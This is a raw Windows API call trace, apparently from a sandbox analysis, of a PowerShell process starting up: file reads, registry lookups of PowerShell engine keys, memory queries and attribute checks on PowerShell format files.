	[0294.074] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.622] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.623] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.623] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.623] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.623] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.623] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.624] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.624] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1000, lpOverlapped=0x0) returned 1
	[0294.624] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x1b4, lpOverlapped=0x0) returned 1
	[0294.624] ReadFile (in: hFile=0x32c, lpBuffer=0x2c357d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d088, lpOverlapped=0x0 | out: lpBuffer=0x2c357d8*, lpNumberOfBytesRead=0x28d088*=0x0, lpOverlapped=0x0) returned 1
	[0294.625] CloseHandle (hObject=0x32c) returned 1
	[0294.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0294.625] SetErrorMode (uMode=0x1) returned 0x1
	[0294.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d000 | out: lpFileInformation=0x28d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0294.625] SetErrorMode (uMode=0x1) returned 0x1
	[0294.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0294.626] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0e8 | out: phkResult=0x28d0e8*=0x32c) returned 0x0
	[0294.626] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d06c, lpData=0x0, lpcbData=0x28d068*=0x0 | out: lpType=0x28d06c*=0x1, lpData=0x0, lpcbData=0x28d068*=0x56) returned 0x0
	[0294.626] CoTaskMemAlloc (cb=0x5a) returned 0x50cbb0
	[0294.626] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d03c, lpData=0x50cbb0, lpcbData=0x28d038*=0x56 | out: lpType=0x28d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d038*=0x56) returned 0x0
	[0294.626] CoTaskMemFree (pv=0x50cbb0) 
	[0294.626] RegCloseKey (hKey=0x32c) returned 0x0
	[0294.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0294.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0296.035] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.046] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.048] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.048] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.048] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.048] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.049] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.050] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.059] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.059] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.059] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.059] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.059] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.059] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.059] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.059] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.726] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.737] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.737] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.737] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.737] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.738] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.738] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.738] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.738] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.739] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.739] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.739] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.739] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.739] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.741] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.742] VirtualQuery (in: lpAddress=0x28bde0, lpBuffer=0x28cca0, dwLength=0x30 | out: lpBuffer=0x28cca0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.742] VirtualQuery (in: lpAddress=0x28bde0, lpBuffer=0x28cca0, dwLength=0x30 | out: lpBuffer=0x28cca0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.742] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.743] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.406] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.406] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.406] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.409] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0297.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.409] CoTaskMemFree (pv=0x471c50) 
	[0297.410] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.414] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.414] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.414] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.414] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.415] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.415] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.416] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.417] VirtualQuery (in: lpAddress=0x28bdd0, lpBuffer=0x28cc90, dwLength=0x30 | out: lpBuffer=0x28cc90*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.418] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d288 | out: phkResult=0x28d288*=0x32c) returned 0x0
	[0297.418] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x28d29c, lpData=0x0, lpcbData=0x28d298*=0x0 | out: lpType=0x28d29c*=0x1, lpData=0x0, lpcbData=0x28d298*=0x74) returned 0x0
	[0297.418] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x28d20c, lpData=0x0, lpcbData=0x28d208*=0x0 | out: lpType=0x28d20c*=0x1, lpData=0x0, lpcbData=0x28d208*=0x74) returned 0x0
	[0297.418] CoTaskMemAlloc (cb=0x78) returned 0x4b1000
	[0297.418] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x28d1dc, lpData=0x4b1000, lpcbData=0x28d1d8*=0x74 | out: lpType=0x28d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x28d1d8*=0x74) returned 0x0
	[0297.418] CoTaskMemFree (pv=0x4b1000) 
	[0297.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x28cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0297.419] SetErrorMode (uMode=0x1) returned 0x1
	[0297.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0297.419] SetErrorMode (uMode=0x1) returned 0x1
	[0297.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.420] SetErrorMode (uMode=0x1) returned 0x1
	[0297.420] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0297.421] SetErrorMode (uMode=0x1) returned 0x1
	[0297.421] SetErrorMode (uMode=0x1) returned 0x1
	[0297.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0297.421] SetErrorMode (uMode=0x1) returned 0x1
	[0297.421] SetErrorMode (uMode=0x1) returned 0x1
	[0297.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0297.421] SetErrorMode (uMode=0x1) returned 0x1
	[0297.422] SetErrorMode (uMode=0x1) returned 0x1
	[0297.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0297.422] SetErrorMode (uMode=0x1) returned 0x1
	[0297.422] SetErrorMode (uMode=0x1) returned 0x1
	[0297.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d160 | out: lpFileInformation=0x28d160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
